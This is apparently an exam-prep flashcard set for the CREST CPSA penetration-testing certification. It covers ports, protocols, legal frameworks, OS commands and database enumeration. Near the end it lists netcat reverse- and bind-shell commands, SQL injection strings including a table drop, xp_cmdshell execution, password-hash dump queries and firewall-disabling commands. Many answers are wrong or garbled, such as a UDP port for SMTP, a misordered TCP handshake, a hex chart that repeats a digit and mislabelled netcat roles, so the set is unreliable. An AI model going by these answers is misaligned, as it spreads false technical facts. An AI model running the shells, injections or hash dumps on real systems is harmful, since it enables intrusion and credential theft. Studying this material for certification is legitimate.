CREST CPSA New Practice Exam With Accurate Solutions 100% Verified Latest Update, Exams of Information Technology


Typology: Exams

2024/2025

Available from 12/02/2024

Smartsolutions

iptables - ANSWER A user-space utility program that allows a system administrator to configure the tables provided by the Linux kernel firewall and the chains and rules it stores.

Squid Proxy - ANSWER 3128

Wireshark and TCPdump - ANSWER Common packet analyzers. Allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

pfSense - ANSWER Open source firewall/router computer software distribution based on FreeBSD.

Benefits of a Penetration Test - ANSWER

  • Improvement of the management system
  • Avoiding fines
  • Protection against financial loss
  • Customer protection

Structure of a Penetration Test - ANSWER Planning and Preparation, Reconnaissance, Discovery, Information and Risk Analysis, Active Intrusion Attempts, Final Analysis, Report Preparation

Another Structure of a Penetration Test - ANSWER Reconnaissance, Vulnerability Scanning, Investigation, Exploitation

Infrastructure Testing - ANSWER Includes all internal computer systems, associated external devices, internet networking, cloud and virtualization testing.

Types of Infrastructure Testing - ANSWER

  • External Infrastructure Penetration Testing
  • Internal Infrastructure Penetration Testing
  • Cloud and Virtualization Penetration Testing
  • Wireless Security Penetration Testing

External Infrastructure Testing - ANSWER Mapping flaws in the external infrastructure

Benefits of External Infrastructure Testing - ANSWER

  • Identifies flaws within the firewall configuration that could be misused.
  • Finds how information could be leaked out from the system
  • Suggests how these issues could be fixed
  • Prepares an extensive report on the security risk of the networks and suggests solutions for the same.
  • Ensures overall efficiency and productivity of your business.

Benefits of Internal Infrastructure Testing - ANSWER

  • Finds out how even a small security weakness can be used by an internal attacker to his advantage
  • Finds out the potential business risk and damage that an internal attacker can cause to your business
  • Enhances internal infrastructure security systems
  • Prepares an inclusive report giving details of the security exposures of internal networks along with the detailed action plan on how to deal with it

Benefits of Cloud and Virtualization Penetration Testing - ANSWER

  • Discover the real risks within the virtual environment and suggests the methods and costs to fix the threats and flaws
  • Provides guidelines and an action plan how to resolve the issues
  • Improves the overall protection systems
  • Prepares a comprehensive security system report of the cloud computing and virtualization, outline the security flaws, causes and possible solutions

Benefits of Wireless Security Penetration Testing - ANSWER

  • To find the potential risk caused by your wireless device
  • To provide guidelines and an action plan on how to protect from the external threats
  • To create a detailed security system report of the wireless networking, to describe the security weakness, reasons, and potential solutions

Black Box Testing - ANSWER Black-box testing is a method in which the tester is given no information about the application being tested.

Advantages of Black Box Testing - ANSWER

  • Test is generally conducted with the perspective of a user, not the designer
  • Checks contradictions in the real system and specifications

Disadvantages of Black Box Penetration Testing - ANSWER

  • Specifically these types of test case are challenging to design
  • Probably, it is not worth, in case designer has already conducted a test case
  • It doesn't do everything

White Box Penetration Testing - ANSWER A tester is provided a whole range of information about the systems and/or network such as schema, source code, os details, ip address, etc.

Advantages of White Box Penetration Testing - ANSWER

  • It ensures that all independent paths of a module have been exercised
  • It ensures that all logical decisions have been verified along with their true and false value.
  • It locates the typographical errors and does syntax checking
  • It locates the design errors that may have occurred because of the difference between logical flow of the program and the actual execution.

Computer Misuse Act 1990 Highlights - ANSWER

  • Section 1: Unauthorized access to computer material
  • Section 2: Unauthorized access with intent to commit or facilitate commission of further offenses
  • Section 3: Unauthorized acts with intent to impair, or with recklessness as to impairing the operation of a computer

Human Rights Act 1998 Highlights - ANSWER

  • The right to life
  • The right to respect for private and family life
  • The right to freedom of religion and belief
  • Your right not to be mistreated or wrongly punished by the state

Consent Information for Penetration Test - ANSWER

  • Contact Name & Title of person giving consent
  • Testing window - Date range and hours of testing allowed
  • Names & Contact details of technical team that can assist if needed during test
  • IP addresses or URL to be included in test
  • Any exclusions to specific hosts, services, or areas to be tested within applications
  • Authentication credentials that are considered needed for the purpose of a penetration test in a private application

Data Protection Act 1998 Highlights - ANSWER

  • Personal data shall be processed fairly and lawfully
  • be obtained only for lawful purposes and not processed in any manner incompatible with those purposes
  • be adequate, relevant and not excessive
  • be accurate and current
  • not be retained for longer than necessary
  • be processed in accordance with the rights and freedoms of data subjects
  • Be protected against unauthorized or unlawful processing and against accidental loss, destruction or damage

Police and Justice Act 2006 Highlights - ANSWER

  • Make amendments to the computer misuse act 1990
  • increased penalties of computer misuse act (makes unauthorized computer access serious enough to fall under extradition)
  • Made it illegal to perform DOS attacks
  • It made illegal the supply and ownership of hacking tools.
  • Be cagey when releasing information about exploits.

Issues Between Tester and Client - ANSWER

  • The tester is unknown to his client - so, on what grounds he should be given access of sensitive data
  • who will take the guarantee of security of lost data?
  • The client may blame for the loss of data or confidentiality to tester.

Legal Penetration Testing - ANSWER

  • A statement of intent to be duly signed by both parties
  • The tester has the permission in writing with clearly defined parameters
  • the company has the details of its pen tester and an assurance that he would not leak any confidential data

Scoping a CBT - ANSWER

  • All relevant risk owners
  • Technical staff knowledgeable about the target system
  • The penetration test team should identify what testing they believe will give a full picture of the vulnerability status of the estate
  • A representative of the penetration test team
  • Risk owners should outline any areas of special concern

IP - ANSWER The IP (Internet Protocol) is the network layer communications protocol in the Internet protocol suite used for relaying datagrams across network boundaries.

TCP - ANSWER TCP stands for Transmission Control Protocol. It is a main protocol from the Internet protocol suite.

Task of TCP - ANSWER To establish a connection between the client and the server before data can be sent.

User Datagram Protocol - ANSWER Applications that do not require a reliable data stream use User Datagram Protocol.

Responsibility of Internet Protocol - ANSWER Delivering packets from the source host to the destination host with their IP addresses in the packet header.

UDP - ANSWER Yes, UDP is in the Internet protocol suite.

SYN in TCP Handshake - ANSWER The use of SYN is to initiate and establish a connection. It also helps you to synchronize sequence numbers between devices.

UDP handshakes - ANSWER No, UDP does not perform handshakes.

ACK in TCP handshaking - ANSWER Helps to confirm to the other side that it has received the SYN.

SYN-ACK in TCP handshaking - ANSWER SYN-ACK is a SYN message from the local device and ACK of the earlier packet.

FIN - ANSWER Used to terminate the connection.

Three way handshake - ANSWER TCP is known for performing a three way handshake.

SYN - ANSWER SYN means Synchronize.

SYN-ACK phase - ANSWER SYN-ACK is the third phase after the SYN and ACK phases of a TCP handshake.

ACK - ANSWER ACK means Acknowledgement.

SYN-ACK - ANSWER SYN-ACK means Synchronize Acknowledgement.

FIN in TCP - ANSWER FIN means Finish.

Port 9100 - ANSWER Jetdirect.

Port 567 - ANSWER DHCPv6 (servers).

Port 593 - ANSWER RPC over HTTPS.

Port 49 - ANSWER TACACS.

TACACS - Terminal Access Control of Authentication and Control Systems.

Port 514 - Syslog.

Port 520 - RIP.

Port 123 - NTP.

Port 500 - Internet Security Association and Key Management Protocol - Key exchange.

Port 587 - SMTP.

UDP port for SMTP - 587.

Port 1521 - Oracle.

Port 6000 - X11.

Port 21 - FTP.

Port 389 - LDAP.

Port 67 - DHCP server.

Port 23 - ANSWER Telnet.

Port 546 - ANSWER DHCPv6 (client).

Port 445 - ANSWER SMB.

Port 161 - ANSWER SNMP.

Port 143 - ANSWER IMAP.

Port 1194 - ANSWER VPN.

Port 1434 - ANSWER MS-SQL (monitoring).

Port 636 - ANSWER LDAPS.

Port 3306 - ANSWER MYSQL.

Port 69 - ANSWER TFTP.

Port 25 - ANSWER SMTP.

Port 53 - ANSWER DNS.

Port 80 - ANSWER HTTP.

Port 139 - ANSWER NETBIOS (session services).

Port 1433 - ANSWER MS-SQL.

Port 2049 - ANSWER NFS, or Network File System.

Port 5060 - ANSWER, this is the Session Initiation Protocol for unencrypted signalling, utilizing TCP/UDP.

Port 3389 - ANSWER RDP or Remote Desktop Protocol.

Port 5222 - ANSWER, this is used for Jabber.

Port 179 - ANSWER, the Border Gateway protocol.

Port 902 - ANSWER, VMWARE.

Port 1080 - ANSWER, this is the SOCKS Proxy.

Dameware - ANSWER, 6129 and 1629.

Port 6667 - ANSWER, this is IRC.

Port 9001 - ANSWER, Tor, HSQL.

Port 9090 - ANSWER, Openfire.

Port 5666 - ANSWER, Nagios.

Port 5432 - ANSWER Postgres.

Service on port 201 - ANSWER AppleTalk.

Nagios - ANSWER An open source system monitoring service.

Postgres - ANSWER An object relational database management system.

X11 - ANSWER A windowing display system for bitmap displays, common on unix-like operating systems.

CDP - ANSWER Cisco Discovery Protocol.

Function of CDP - ANSWER It's a network discovery tool, allows admins to identify neighboring Cisco devices.

CDP default setting - ANSWER Yes, CDP is enabled by default.

DTP - ANSWER Dynamic Trunking Protocol.

HSRP - ANSWER Hot Standby Router Protocol.

VTP - ANSWER Protocol that propagates the definition of VLANs on the whole local area network.

Hot Standby Router Protocol - ANSWER A network protocol that provides redundancy for routers.

Symmetric Encryption - ANSWER Only one key is used to both encrypt and decrypt electronic information.

Asymmetric Encryption - ANSWER There is a public key to encrypt and a private key to decrypt.

Block Algorithm - ANSWER An algorithm that encrypts information in blocks.

Yersinia - ANSWER A Layer 2 Testing Tool.

OSI Layer 7 - ANSWER Application Layer.

OSI Layer 5 - ANSWER Session Layer.

OSI Layer 3 - ANSWER Network Layer.

OSI Layer 1 - ANSWER Physical Layer.

OSI Layer 2 - ANSWER Data Link Layer.

OSI Layer 4 - ANSWER Transport Layer.

OSI Layer 6 - ANSWER Presentation Layer.

CDP Advantages - ANSWER Finds out about neighbouring devices and their configuration, can discover routers or switches that are incorrectly configured, helps in troubleshooting.

Layer 4 Function - ANSWER Send data across using the TCP and UDP protocols.

Layer 7 Function - ANSWER Applications have access to the network services.

Layer 1 Function - ANSWER Transmits raw bitstream across the physical medium.

Layer 6 Function - ANSWER Ensures that data is in a usable format and is where data encryption occurs.

Layer 5 Function - ANSWER Maintains connections and is responsible for controlling ports and sessions.

Layer 2 Function - ANSWER Defines the format of data on the network.

Layer 3 Function - ANSWER Decides which physical path the data will take.

TCP Port 1 - ANSWER TCP Port Service Multiplexer (TCPMUX).

TCP Port 5 - ANSWER Remote Job Entry (RJE).

TCP Port 7 - ANSWER ECHO or ICMP.

TCP Port 18 - ANSWER Message Send Protocol (MSP).

TCP Port 29 - ANSWER MSG ICP.

TCP Port 37 - ANSWER Time Protocol.

TCP Port 42 - ANSWER Host Name Server (Nameserv).

TCP Port 43 - ANSWER WHOIS.

TCP Port 70 - ANSWER Gopher Services.

TCP Port 79 - ANSWER Finger.

TCP Port 103 - ANSWER X.400 Standard.

TCP Port 159 - ANSWER SQL Server.

TCP Port 190 - ANSWER Gateway Access Control Protocol (GACP).

TCP Port 118 - ANSWER SQL Services.

TCP Port 197 - ANSWER Directory Location Service (DLS).

TCP Port 398 - ANSWER Novell Netware over IP.

TCP Port 119 - ANSWER NNTP (Network News Transfer Protocol) Newsgroup.

TCP Port 444 - ANSWER Simple Network Paging Protocol (SNPP).

TCP Port 453 - ANSWER Apple Quicktime.

TCP Port 500 - ANSWER IKE Internet Key Exchange.

TCP/IP Model Mnemonic - ANSWER Never Ingest Turian Almonds.

CAT5 - ANSWER CAT5 category 5 cable is a twisted pair cable for computer networking.

10/100/1000baseT - ANSWER An Ethernet standard developed by the Institute of Electrical and Electronics Engineers (IEEE).

Token Ring - ANSWER A data link for a local area network (LAN) in which all stations are connected in a ring or star topology.

Wireless (802.11) - ANSWER The IEEE 802.11 is a standard employed for wireless Ethernet networks.

LM Hash - ANSWER Primary Windows LAN hash prior to Windows NT with 14 character limit.

DES Encryption - ANSWER A 64 bit block cipher that has five modes of operation, repeated 16 times for each encryption/decryption operation.

3DES Encryption - ANSWER 168 bit key encryption (48 cycles).

TTL for Windows - ANSWER 128.

TTL for Linux - ANSWER 64.

TTL (Time to Live) - ANSWER Indicates the maximum time that an IPv4 packet can reside on the network before being discarded.

Cisco Password Encryption - ANSWER Various including secret 4: Crappy SHA256, secret 5: Salted MD5.

SIP Requests - ANSWER INVITE, ACK, BYE, CANCEL, OPTIONS, REGISTER, PRACK, SUBSCRIBE, NOTIFY, PUBLISH, INFO, REFER, MESSAGE, UPDATE.

SMTP Requests - ANSWER MAIL, RCPT, DATA.

SNMP Requests - ANSWER Get, GetNext, Set, GetBulk, Response, Trap, Inform.

HTTP Status Codes - ANSWER 1xx - Info, 2xx - Success, 3xx - Redirection, 4xx - Error, 5xx - Server Error.

HTTP Status Code 404 - ANSWER NOT FOUND the method is not available.

HTTP Status Code 302 - ANSWER Temporarily Moved.

HTTP Status Code 301 - ANSWER Moved Permanently.

HTTP Status Code 410 - ANSWER Gone.

SQL Injection (Escape Characters) - ANSWER ' OR '1' = '1' --.

SQL Injections (Type Handling) - ANSWER 1; DROP TABLE users.

Linux File Permissions - ANSWER drwxrwxrwx 2 user(owner) group size date filename.

Linux Command: Change Password - ANSWER passwd .

Linux Command: Find Files of Type - ANSWER find.

-type f -iname '*.pdf' - ANSWER Finds files of type PDF.

locate '.pdf' - ANSWER Locates PDF files in the system.

/bin - ANSWER User Binaries

/boot - ANSWER Bootup related files

/dev - ANSWER Interface for system devices

/etc - ANSWER System Config Files

/home - ANSWER Base directory for user files

/lib - ANSWER Critical software libraries

/opt - ANSWER Third party software

/proc - ANSWER System and running processes

/root - ANSWER Home for root

/sbin - ANSWER Sys Admin binaries

/tmp - ANSWER Temporary Files

/usr - ANSWER Less critical files

/var - ANSWER Variable system files

prstat -a - ANSWER Solaris Command: Process Listing.

svcs -a - ANSWER Solaris Command: Services and Status.

svcadm start - ANSWER Solaris Command: Start Service (Admin).

Windows NT 5.0 versions - ANSWER Windows 2000 (all).

Windows NT 5.1 Versions - ANSWER Windows XP (Home, pro, MC, Tablet, PC, Starter, Embedded).

Windows NT 5.2 Versions - ANSWER Windows XP (64 bit, Pro 64 bit), Windows Server 2003 and R2, Windows Home Server.

Windows NT 6.0 Versions - ANSWER Windows Vista (ALL), Windows Server 2008 (Foundation, Standard, Enterprise).

Windows NT 6.1 Versions - ANSWER Windows 7 (ALL), Windows Server 2008 R2 (ALL).

Windows NT 6.2 Versions - ANSWER Windows 8, Windows Phone 8, Windows Server 2012.

Windows NT 10 versions - ANSWER Windows 10, Windows Server 2016, Windows Server 2019, Windows Server 2022, Windows 11.

%SYSTEMDRIVE%\boot.ini - ANSWER Contains the boot options for computers with BIOS firmware running NT-based operating system prior to Windows Vista.

%SYSTEMROOT%\repair\SAM - ANSWER Stores Windows users' passwords in a hashed format, in LM hash and NTLM hash. These are backups of C:\windows\system32\config\SAM.

Windows Commands: System Info - ANSWER ver : OS Version, sc query state=all : Services, tasklist /svc : Processes and Services, echo %USERNAME% : Current user.

Windows Command: Find Files of Type - ANSWER dir /a /s /n c:\*.pdf.

Windows Commands: Add User, Make Admin - ANSWER net user /add, net localgroup "Administrators" /add.

Linux Command: Add User, Make Sudoer - ANSWER useradd (adduser ), passwd , sudo useradd , sudo (sudo adduser sudo).

Command: View Network Info - ANSWER Linux: ifconfig, Windows: ipconfig /all.

Command: Display File Contents - ANSWER Linux: , Windows: cat .

nslookup - A command-line utility used in network administration to query the DNS to determine a domain name or IP address mapping or any other specific DNS record.

IIS 1 Defaults - ANSWER Windows NT Addon.

IIS 4 Defaults - ANSWER NT4 Option Pack.

IIS 5 Defaults - ANSWER Windows 2000.

IIS 2 Defaults - ANSWER NT 4.0.

IIS 5.1 Defaults - ANSWER Windows XP.

IIS 3 Defaults - ANSWER NT 4 Service Pack.

IIS 6 Defaults - ANSWER Windows Server 2003, Windows XP Pro.

IIS 7 Defaults - ANSWER Windows Vista, Server 2008.

IIS 7.5 Defaults - ANSWER Windows 7, 2008 R2.

IIS 8 Defaults - ANSWER Windows Server 2012, Windows 8.

IIS 8.5 Defaults - ANSWER Windows Server 2012 R2, Windows 8.1.

IIS 10 v 1607 Defaults - ANSWER Windows Server 2016, Windows 10 Anniversary Update.

IIS 10 v 1709 Defaults - ANSWER Windows 10 Fall Creators, v1709.

IIS 10 v 1809 Defaults - ANSWER Windows Server 2019, Windows 10 October Update.

Windows Command: Disable Firewall - ANSWER netsh advfirewall set currentprofile state off, netsh advfirewall set allprofiles state off.

Sysinternals Suite - ANSWER A suite of very powerful Windows administration applications to view, troubleshoot and edit Windows functions.

WMIC - ANSWER Windows Management Instrumentation Command-Line.

WMIC Command: Execute Process - ANSWER wmic process call create "process_name".

WMIC Command: Uninstall Software - ANSWER wmic product where name="XX" call uninstall /nointeractive.

PCI Card Info Storage Common-Use - ANSWER

  • Store card details (i.e CC number, expiry) in encrypted form,
  • Store cardholder details (name, address, contact details. i.e PII) in a SEPARATE encrypted database with a unique reference identifier linking the two,
  • DO NOT STORE sensitive data (i.e CVV2, CVV or CID values).

Windows: Active Directory Default Location - ANSWER C:\Windows\NTDS.

Windows: Domain Common Folders - ANSWER C:\Windows\SYSVOL.

dsquery - ANSWER Remote Server Administration Tools (RSAT) feature pack tool used to enumerate Windows Domain.

Classful IP Range: Class A - ANSWER 128 Networks (2^7), 16,777,216 Addresses per network (2^24).

Classful IP Range: Class B - ANSWER 16,384 Networks (2^14), 65,536 Addresses per network (2^16).

Classful IP Range: Class C - ANSWER 2,097,152 Networks (2^21), 256 Addresses per network (2^8).

Classful IP Range Calculation - ANSWER If first bit is "0", it's a class A address. If second bit is a "0", its class B address. If third bit is a "0", its class C address. If the fourth bit is "0", it's class D address. If its "1", then it's class E address.

Classless Subnets / CIDR - ANSWER Class C - 255.255.255.0, /24 (254 Hosts), Class B - 255.255.0.0, /16 (65,534 Hosts), Class A - 255.0.0.0, /8 (16,777,214 Hosts).

Hexadecimal Chart - ANSWER 0, 1, 2, 3, 4, 5, 5, 6, 7, 8, 9, 10 - A, 11 - B, 12 - C, 13 - D, 14 - E, 15 - F.

VLAN - ANSWER A logically segmented switched network, segmented by function, project team, or application, without regard to the physical locations of the users.

VLAN IDs 1002-1005 - ANSWER Token Ring and FDDI VLANs

VLAN IDs greater than 1005 - ANSWER Extended-range VLANs (not stored in the VLAN database)

VLAN IDs 1-1005 - ANSWER Normal-range VLANs

vlan.dat - ANSWER Configurations for VLAN IDs 1-1005

GLBA - ANSWER Gramm-Leach-Bliley Act.

Gramm-Leach-Bliley Act of 1999 - ANSWER Require financial institutions to protect customer data in order to safeguard the security and confidentiality.

GDPR - ANSWER General Data Protection Regulation.

FERPA - ANSWER Family Educational Rights and Privacy Act.

PCI DSS - ANSWER Payment Card Industry Data Security Standard.

Basel Accord - ANSWER An agreement that required banks to hold as capital at least 8% of their risk-weighted assets.

ISO 27000 Series - ANSWER A series containing a range of individual standards and documents specifically reserved by ISO for information security.

COBIT - ANSWER Control Objectives for Information and Related Technology.

IPv4 - ANSWER The Internet Protocol version 4 is the dominant protocol for routing traffic on the Internet, specifying 'to' and 'from' addresses using a dotted decimal such as '122.45.255.0'.

Cat 5 - ANSWER Category 5 wire, a TIA/EIA standard for UTP wiring that can operate at up to 100 Mbps.

TTL - ANSWER Time to Live.

CSMA/CA - ANSWER Carrier Sense Multiple Access with Collision Avoidance.

CDMA - ANSWER Code Division Multiple Access (GSM competitor).

Netcat: Start Listener to Catch Shell - ANSWER Linux: nc 10.0.0.1 1234 -e /bin/sh; Windows: nc 10.0.0.1 1234 -e cmd.exe (-e is execute and is not always supported)

Netcat: Listen - ANSWER nc -nlvp

Netcat: Transfer Text or Binary Files - ANSWER Listener: nc -nlvp 4444 > incoming.exe; Sender: nc -nv IP to send to 4444 < file

Netcat: Bind Shell - ANSWER Listener: nc -nlvp 4444 -e cmd.exe; Sender/ 'Talker': nc -nv IP to connect to 4444

Netcat: Reverse Shell - ANSWER Listener: nc -nlvp 4444; Sender: nc -nv IP to send to 4444 /bin/bash (sends shell!)

NMap: Scan Types - ANSWER -sP : ping scan; -sS : syn scan ('half open' scan); -sT : connect scan (full TCP); -sU : UDP scan; -sO : protocol scan

Port Count 65,536 - ANSWER 2^16 Ports; Applies to TCP AND UDP

NMap: Scan EVERY Port - ANSWER TCP: nmap -p- ; UDP: nmap -sU -p-

NMap: Common Options - ANSWER -p1-65535 : Ports; -T[0-5] : 'Scan Speed', can help hide you; -n : No DNS Resolution; -O : OS Detection; -A : AGGRESSIVE; -sV : Version Detection; -PN : No Ping; -6 : IPv6 Scan; -oA : Output ALL types

NMap: DNS Reverse Lookup - ANSWER nmap -R -sL -dns-server

Hash Lengths - ANSWER MD5 : 16 Bytes; SHA-1 : 20 bytes; SHA-256 : 32 Bytes; SHA-512 : 64 Bytes

IIS - ANSWER Microsoft Web Server

Apache / Tomcat - ANSWER Apache Web Servers

GWS - ANSWER Google Web Server

WebSphere - ANSWER IBM Web Server

MS-SQL: DB Version - ANSWER SELECT @@version; EXEC xp_msver (detailed version info)

MS-SQL: Run OS Command - ANSWER EXEC master.xp_cmdshell 'net user'

MS-SQL: SELECT commands - ANSWER SELECT HOST_NAME( ) : Hostname and IP; SELECT DB_NAME ( ) : Current DB; SELECT name FROM master.sysdatabases; : List DBs; SELECT user_name ( ) : Current user; SELECT name FROM master.syslogins : List users; SELECT name FROM master.sysobjects WHERE xtype='U'; : List Tables; SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='mytable'); : List columns

MS-SQL: List all Tables and Columns - ANSWER SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable')

MS-SQL: System Table (Info on All Tables) - ANSWER SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

MS-SQL 2005 Vulnerability (Password Hashes) - ANSWER SELECT name, password_hash FROM master.sys.sql_logins

Postgres: SELECT statements - ANSWER SELECT version(); : DB Version; SELECT inet_server_addr(); : Hostname and IP; SELECT current_database(); : Current DB; SELECT datname FROM pg_database; : List DBs; SELECT user; : Current user; SELECT username FROM pg_user; : List Users; SELECT username,passwd FROM pg_shadow : List password hashes

MySQL Default Credentials - ANSWER root | MYSQL

MySQL: SELECT Commands - ANSWER SELECT @@version; : DB Version; SELECT @@hostname; : Hostname and IP; SELECT database(); : Current DB; SELECT distinct (db) FROM mysql.db; : List DBs; SELECT user(); : Current user; SELECT user FROM mysql.user; : List Users; SELECT host,user,password FROM mysql.user; : List password hashes